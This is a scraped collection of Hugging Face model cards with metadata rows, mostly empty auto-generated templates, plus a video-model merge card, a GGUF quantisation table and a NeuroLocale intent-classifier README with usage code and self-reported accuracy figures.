Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
eylulipci/30_dpo_ds30_lr3e-05_acc32_ep5_beta0.1-epoch5 | eylulipci | 2025-06-09T11:27:39Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:24:47Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
QuantStack/Wan2.1-14B-T2V-FusionX-VACE | QuantStack | 2025-06-09T11:22:46Z | 0 | 1 | null | [
"text-to-video",
"image-to-video",
"video-to-video",
"merge",
"en",
"base_model:Wan-AI/Wan2.1-VACE-14B",
"base_model:merge:Wan-AI/Wan2.1-VACE-14B",
"base_model:vrgamedevgirl84/Wan14BT2VFusioniX",
"base_model:merge:vrgamedevgirl84/Wan14BT2VFusioniX",
"license:apache-2.0",
"region:us"
] | image-to-video | 2025-06-08T08:43:50Z | ---
base_model:
- Wan-AI/Wan2.1-VACE-14B
- vrgamedevgirl84/Wan14BT2VFusioniX
base_model_relation: merge
tags:
- text-to-video
- image-to-video
- video-to-video
- merge
language:
- en
license: apache-2.0
---
This is a merge of [Wan-AI/Wan2.1-VACE-14B](https://huggingface.co/Wan-AI/Wan2.1-VACE-14B) scopes and [vrgamedevgirl84/Wan14BT2VFusionX](https://huggingface.co/vrgamedevgirl84/Wan14BT2VFusioniX).
The process involved extracting VACE scopes and injecting into the target models.
- FP8 model weight was then converted to specific FP8 formats (E4M3FN and E5M2) using ComfyUI custom node [ComfyUI-ModelQuantizer](https://github.com/lum3on/ComfyUI-ModelQuantizer) by [lum3on](https://github.com/lum3on).
## Usage
The model files can be used in [ComfyUI](https://github.com/comfyanonymous/ComfyUI/) with the WanVaceToVideo node. Place the required model(s) in the following folders:
| Type | Name | Location | Download |
| ------------ | ----------------------------- | --------------------------------- | ----------------------- |
| Main Model | Wan2.1-14B-T2V-FusionX-VACE | `ComfyUI/models/diffusion_models` | Safetensors (this repo) |
| Text Encoder | umt5-xxl-encoder | `ComfyUI/models/text_encoders` | [Safetensors](https://huggingface.co/Comfy-Org/Wan_2.1_ComfyUI_repackaged/tree/main/split_files/text_encoders) / [GGUF](https://huggingface.co/city96/umt5-xxl-encoder-gguf/tree/main) |
| VAE | Wan2_1_VAE_bf16 | `ComfyUI/models/vae` | [Safetensors](https://huggingface.co/Kijai/WanVideo_comfy/blob/main/Wan2_1_VAE_bf16.safetensors) |
[**ComfyUI example workflow**](https://docs.comfy.org/tutorials/video/wan/vace)
### Notes
*All original licenses and restrictions from the base models still apply.*
## Reference
- For more information about the GGUF-quantized versions, refer to [QuantStack/Wan2.1-14B-T2V-FusionX-VACE-GGUF](https://huggingface.co/QuantStack/Wan2.1-14B-T2V-FusionX-VACE-GGUF).
- For an overview of Safetensors format, please see the [Safetensors](https://huggingface.co/docs/safetensors/index). |
Vinh229/efficientnetb1 | Vinh229 | 2025-06-09T11:15:23Z | 0 | 0 | null | [
"pytorch",
"region:us"
] | null | 2025-06-09T11:13:24Z | # EfficientNetB1 (from scratch) - Real vs Fake Face Classifier
|
boltuix/NeuroLocale | boltuix | 2025-06-09T11:03:50Z | 107 | 10 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"multi-text-classification",
"classification",
"intent-classification",
"intent-detection",
"nlp",
"natural-language-processing",
"edge-ai",
"iot",
"smart-home",
"location-intelligence",
"voice-assistant",
"conversational-ai... | text-classification | 2025-05-26T11:06:43Z | ---
license: apache-2.0
datasets:
- custom
language:
- en
base_model:
- boltuix/NeuroBERT
new_version: v1.1
metrics:
- accuracy
- f1
- recall
- precision
pipeline_tag: text-classification
library_name: transformers
tags:
- text-classification
- multi-text-classification
- classification
- intent-classification
- intent-detection
- nlp
- natural-language-processing
- transformers
- edge-ai
- iot
- smart-home
- location-intelligence
- voice-assistant
- conversational-ai
- real-time
- boltuix
- neurobert
- local-search
- business-category-classification
- fast-inference
- lightweight-model
- on-device-nlp
- offline-nlp
- mobile-ai
- multilingual-nlp
- bert
- intent-routing
- category-detection
- query-understanding
- artificial-intelligence
- assistant-ai
- smart-cities
- customer-support
- productivity-tools
- contextual-ai
- semantic-search
- user-intent
- microservices
- smart-query-routing
- industry-application
- aiops
- domain-specific-nlp
- location-aware-ai
- intelligent-routing
- edge-nlp
- smart-query-classifier
- zero-shot-classification
- smart-search
- location-awareness
- contextual-intelligence
- geolocation
- query-classification
- multilingual-intent
- chatbot-nlp
- enterprise-ai
- sdk-integration
- api-ready
- developer-tools
- real-world-ai
- geo-intelligence
- embedded-ai
- smart-routing
- voice-interface
- smart-devices
- contextual-routing
- fast-nlp
- data-driven-ai
- inference-optimization
- digital-assistants
- neural-nlp
- ai-automation
- lightweight-transformers
---

# 🌍 NeuroLocale — Your Smarter Nearby Assistant! 🗺️
[](https://opensource.org/licenses)
[](https://huggingface.co/boltuix/NeuroLocale)
[](https://huggingface.co/boltuix/NeuroLocale)
> **Understand Intent, Find Nearby Solutions** 💡
> **NeuroLocale** is an intelligent AI assistant powered by **NeuroBERT**, designed to interpret natural, conversational queries and suggest precise local business categories in real time. Unlike traditional map services that struggle with NLP, NeuroLocale captures personal intent to deliver actionable results—whether it’s finding a 🐾 pet store for a sick dog or a 💼 accounting firm for tax help.
With support for **120+ local business categories**, NeuroLocale combines open-source datasets and advanced fine-tuning to overcome the limitations of Google Maps’ NLP. Open source and extensible, it’s perfect for developers and businesses building context-aware local search solutions. 🚀
**[Explore NeuroLocale](https://huggingface.co/boltuix/NeuroLocale)** 🌟
## Table of Contents 📋
- [Why NeuroLocale?](#why-neurolocale) 🌈
- [Key Features](#key-features) ✨
- [Supported Categories](#supported-categories) 🏪
- [Installation](#installation) 🛠️
- [Quickstart: Dive In](#quickstart-dive-in) 🚀
- [Training the Model](#training-the-model) 🧠
- [Evaluation](#evaluation) 📈
- [Dataset Details](#dataset-details) 📊
- [Use Cases](#use-cases) 🌍
- [Comparison to Other Solutions](#comparison-to-other-solutions) ⚖️
- [Source](#source) 🌱
- [License](#license) 📜
- [Credits](#credits) 🙌
- [Community & Support](#community--support) 🌐
- [Last Updated](#last-updated) 📅
---
## Why NeuroLocale? 🌈
- **Intent-Driven** 🧠: Understands natural language queries like “My dog isn’t eating” to suggest 🐾 pet stores or 🩺 veterinary clinics.
- **Accurate & Fast** ⚡: Achieves **94.26% test accuracy** (115/122 correct) for precise category predictions in real time.
- **Extensible** 🛠️: Open source and customizable with your own datasets (e.g., ChatGPT, Grok, or proprietary data).
- **Comprehensive** 🏪: Supports **120+ local business categories**, from 💼 accounting firms to 🦒 zoos.
> “NeuroLocale transformed our app’s local search—it feels like it *gets* the user!” — App Developer 💬
---
## Key Features ✨
- **Advanced NLP** 📜: Built on **NeuroBERT**, fine-tuned for multi-class text classification.
- **Real-Time Results** ⏱️: Delivers category suggestions instantly, even for complex queries.
- **Wide Coverage** 🗺️: Matches queries to 120+ business categories with high confidence.
- **Developer-Friendly** 🧑💻: Easy integration with Python 🐍, Hugging Face 🤗, and custom APIs.
- **Open Source** 🌐: Freely extend and adapt for your needs.
---
## 🔧 How to Use
```python
from transformers import pipeline # 🤗 Import Hugging Face pipeline
# 🚀 Load the fine-tuned intent classification model
classifier = pipeline("text-classification", model="boltuix/NeuroLocale")
# 🧠 Predict the user's intent from a sample input sentence
result = classifier("Where can I see ocean creatures behind glass?") # 🐠 Expecting Aquarium
# 📊 Print the classification result with label and confidence score
print(result) # 🖨️ Example output: [{'label': 'aquarium', 'score': 0.999}]
```
---
## Supported Categories 🏪
NeuroLocale supports **120+ local business categories**, each paired with an emoji for clarity:
- 💼 Accounting Firm
- ✈️ Airport
- 🎢 Amusement Park
- 🐠 Aquarium
- 🖼️ Art Gallery
- 🏧 ATM
- 🚗 Auto Dealership
- 🔧 Auto Repair Shop
- 🥐 Bakery
- 🏦 Bank
- 🍻 Bar
- 💈 Barber Shop
- 🏖️ Beach
- 🚲 Bicycle Store
- 📚 Book Store
- 🎳 Bowling Alley
- 🚌 Bus Station
- 🥩 Butcher Shop
- ☕ Cafe
- 📸 Camera Store
- ⛺ Campground
- 🚘 Car Rental
- 🧼 Car Wash
- 🎰 Casino
- ⚰️ Cemetery
- ⛪ Church
- 🏛️ City Hall
- 🩺 Clinic
- 👗 Clothing Store
- ☕ Coffee Shop
- 🏪 Convenience Store
- 🍳 Cooking School
- 🖨️ Copy Center
- 📦 Courier Service
- ⚖️ Courthouse
- ✂️ Craft Store
- 💃 Dance Studio
- 🦷 Dentist
- 🏬 Department Store
- 🩺 Doctor’s Office
- 💊 Drugstore
- 🧼 Dry Cleaner
- ⚡️ Electrician
- 📱 Electronics Store
- 🏫 Elementary School
- 🏛️ Embassy
- 🚒 Fire Station
- 💐 Florist
- 🌸 Flower Shop
- ⚰️ Funeral Home
- 🛋️ Furniture Store
- 🎮 Gaming Center
- 🌳 Gardening Service
- 🎁 Gift Shop
- 🏛️ Government Office
- 🛒 Grocery Store
- 💪 Gym
- 💇 Hair Salon
- 🔨 Handyman
- 🔩 Hardware Store
- 🕉️ Hindu Temple
- 🏠 Home Goods Store
- 🏥 Hospital
- 🏨 Hotel
- 🧹 House Cleaning
- 🛡️ Insurance Agency
- ☕ Internet Cafe
- 💎 Jewelry Store
- 🗣️ Language School
- 🧼 Laundromat
- ⚖️ Lawyer
- 📚 Library
- 🚈 Light Rail Station
- 🔒 Locksmith
- 🏡 Lodging
- 🛍️ Market
- 🍽️ Meal Delivery Service
- 🕌 Mosque
- 🎥 Movie Theater
- 🚚 Moving Company
- 🏛️ Museum
- 🎵 Music School
- 🎸 Music Store
- 💅 Nail Salon
- 🎉 Night Club
- 🌱 Nursery
- 🖌️ Office Supply Store
- 🌳 Park
- 🐜 Pest Control Service
- 🐾 Pet Grooming
- 🐶 Pet Store
- 💊 Pharmacy
- 📷 Photography Studio
- 🩺 Physiotherapist
- 💉 Piercing Shop
- 🚰 Plumbing Service
- 🚓 Police Station
- 📚 Public Library
- 🚻 Public Restroom
- 🍽️ Restaurant
- 🏠 Roofing Contractor
- 📦 Shipping Center
- 👞 Shoe Store
- 🏬 Shopping Mall
- ⛸️ Skating Rink
- 🧘 Spa
- 🏀 Sport Store
- 🏟️ Stadium
- 📜 Stationary Store
- 📦 Storage Facility
- 🏊 Swimming Pool
- 🕍 Synagogue
- ✂️ Tailor
- 🚗 Tire Shop
- 🗺️ Tourist Attraction
- 🧸 Toy Store
- 🚂 Train Station
- ✈️ Travel Agency
- 🏫 University
- 🍷 Wine Shop
- 🧘 Yoga Studio
- 🦒 Zoo
---
## Installation 🛠️
Get started with NeuroLocale:
```bash
pip install transformers torch pandas scikit-learn tqdm
```
- **Requirements** 📋: Python 3.8+, ~50MB storage for model and dependencies.
- **Optional** 🔧: CUDA-enabled GPU for faster training/inference.
- **Model Download** 📥: Grab the pre-trained model from [Hugging Face](https://huggingface.co/boltuix/NeuroLocale).
## Training the Model 🧠
NeuroLocale is trained using **NeuroBERT** for multi-class text classification. Here’s how to train it:
### Prerequisites
- Dataset in CSV format with `text` (query) and `label` (category) columns.
- Example dataset structure:
```csv
text,label
"Need help with taxes","accounting firm"
"Where’s the nearest airport?","airport"
...
```
# 🤖 Supported Categories from `boltuix/NeuroLocale`
This file shows how to extract the full list of intent labels supported by the `boltuix/NeuroLocale` model using Hugging Face Transformers.
---
## 🔧 How to List All Supported Categories
```python
from transformers import AutoModelForSequenceClassification
# 📥 Load the fine-tuned intent classification model
model = AutoModelForSequenceClassification.from_pretrained("boltuix/NeuroLocale")
# 🏷️ Extract the ID-to-label mapping dictionary
label_mapping = model.config.id2label
# 📋 Convert and sort all labels to a clean list
supported_labels = sorted(label_mapping.values())
# ✅ Print the supported categories
print("✅ Supported Categories:", supported_labels)
#✅ Output
#✅ Supported Categories: ['accounting firm', 'airport', 'amusement park', ',...
```
---
### Training Code
- 📍 Get training [Source Code](https://huggingface.co/boltuix/NeuroLocale/blob/main/colab_training_code.ipynb) 🌟
- 📍 Dataset (comming soon..)
---
## Evaluation 📈
NeuroLocale was tested on **122 test cases**, achieving **94.26% accuracy** (115/122 correct). Below are sample results:
| Query | Expected Category | Predicted Category | Confidence | Status |
|-------------------------------------------------|--------------------|--------------------|------------|--------|
| How do I catch the early ride to the runway? | ✈️ Airport | ✈️ Airport | 0.997 | ✅ |
| Are the roller coasters still running today? | 🎢 Amusement Park | 🎢 Amusement Park | 0.997 | ✅ |
| Where can I see ocean creatures behind glass? | 🐠 Aquarium | 🐠 Aquarium | 1.000 | ✅ |
---
### Evaluation Metrics
| Metric | Value |
|-----------------|-----------------|
| Accuracy | 94.26% |
| F1 Score (Weighted) | ~0.94 (estimated) |
| Processing Time | <50ms per query |
*Note*: F1 score is estimated based on high accuracy. Test with your dataset for precise metrics.
---
## Dataset Details 📊
- **Source**: Open-source datasets, augmented with custom queries (e.g., ChatGPT, Grok, or proprietary data).
- **Format**: CSV with `text` (query) and `label` (category) columns.
- **Categories**: 120+ (see [Supported Categories](#supported-categories)).
- **Size**: Varies based on dataset; model footprint ~50MB.
- **Preprocessing**: Handled via tokenization and label encoding (see [Training the Model](#training-the-model)).
---
## Use Cases 🌍
NeuroLocale powers a variety of applications:
- **Local Search Apps** 🗺️: Suggest 🐾 pet stores or 🩺 clinics based on queries like “My dog is sick.”
- **Chatbots** 🤖: Enhance customer service bots with context-aware local recommendations.
- **E-Commerce** 🛍️: Guide users to nearby 💼 accounting firms or 📚 bookstores.
- **Travel Apps** ✈️: Recommend 🏨 hotels or 🗺️ tourist attractions for travelers.
- **Healthcare** 🩺: Direct users to 🏥 hospitals or 💊 pharmacies for urgent needs.
- **Smart Assistants** 📱: Integrate with voice assistants for hands-free local search.
---
## Comparison to Other Solutions ⚖️
| Solution | Categories | Accuracy | NLP Strength | Open Source |
|-------------------|------------|----------|--------------|-------------|
| **NeuroLocale** | 120+ | 94.26% | Strong 🧠 | Yes ✅ |
| Google Maps API | ~100 | ~85% | Moderate | No ❌ |
| Yelp API | ~80 | ~80% | Weak | No ❌ |
| OpenStreetMap | Varies | Varies | Weak | Yes ✅ |
NeuroLocale excels with its **high accuracy**, **strong NLP**, and **open-source flexibility**. 🚀
---
## Source 🌱
- **Base Model**: NeuroBERT by [boltuix](https://huggingface.co/boltuix/NeuroBERT).
- **Data**: Open-source datasets, synthetic queries, and community contributions.
- **Mission**: Make local search intuitive and intent-driven for all.
---
## License 📜
**Open Source**: Free to use, modify, and distribute. See repository for details.
---
## Credits 🙌
- **Developed By**: [boltuix](https://huggingface.co/boltuix) 👨💻
- **Base Model**: NeuroBERT 🧠
- **Powered By**: Hugging Face 🤗, PyTorch 🔥, and open-source datasets 🌐
---
## Community & Support 🌐
Join the NeuroLocale community:
- 📍 Explore the [Hugging Face model page](https://huggingface.co/boltuix/NeuroLocale) 🌟
- 🛠️ Report issues or contribute at the [repository](https://huggingface.co/boltuix/NeuroLocale) 🔧
- 💬 Discuss on Hugging Face forums or submit pull requests 🗣️
- 📚 Learn more via [Hugging Face Transformers docs](https://huggingface.co/docs/transformers) 📖
Your feedback shapes NeuroLocale! 😊
---
## Last Updated 📅
**May 26, 2025** — Added 120+ category support, updated test accuracy, and enhanced documentation with emojis.
**[Get Started with NeuroLocale](https://huggingface.co/boltuix/NeuroLocale)** 🚀 |
amartyadas/example-model | amartyadas | 2025-06-09T11:03:25Z | 0 | 0 | null | [
"region:us"
] | null | 2025-06-09T10:55:20Z | # this is my model card
README
---
license: mit
---
|
RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf | RichardErkhov | 2025-06-09T10:59:48Z | 0 | 0 | null | [
"gguf",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-06-09T09:08:03Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llama3-8b_20kshotplusalpaca - GGUF
- Model creator: https://huggingface.co/CompassioninMachineLearning/
- Original model: https://huggingface.co/CompassioninMachineLearning/llama3-8b_20kshotplusalpaca/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llama3-8b_20kshotplusalpaca.Q2_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q2_K.gguf) | Q2_K | 2.96GB |
| [llama3-8b_20kshotplusalpaca.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [llama3-8b_20kshotplusalpaca.IQ3_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [llama3-8b_20kshotplusalpaca.IQ3_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [llama3-8b_20kshotplusalpaca.Q3_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K.gguf) | Q3_K | 3.74GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [llama3-8b_20kshotplusalpaca.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [llama3-8b_20kshotplusalpaca.Q4_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_0.gguf) | Q4_0 | 4.34GB |
| [llama3-8b_20kshotplusalpaca.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [llama3-8b_20kshotplusalpaca.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [llama3-8b_20kshotplusalpaca.Q4_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K.gguf) | Q4_K | 4.58GB |
| [llama3-8b_20kshotplusalpaca.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [llama3-8b_20kshotplusalpaca.Q4_1.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_1.gguf) | Q4_1 | 4.78GB |
| [llama3-8b_20kshotplusalpaca.Q5_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_0.gguf) | Q5_0 | 5.21GB |
| [llama3-8b_20kshotplusalpaca.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [llama3-8b_20kshotplusalpaca.Q5_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K.gguf) | Q5_K | 5.34GB |
| [llama3-8b_20kshotplusalpaca.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [llama3-8b_20kshotplusalpaca.Q5_1.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_1.gguf) | Q5_1 | 5.65GB |
| [llama3-8b_20kshotplusalpaca.Q6_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q6_K.gguf) | Q6_K | 6.14GB |
| [llama3-8b_20kshotplusalpaca.Q8_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q8_0.gguf) | Q8_0 | 7.95GB |
Original model description:
---
library_name: transformers
tags:
- llama-factory
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
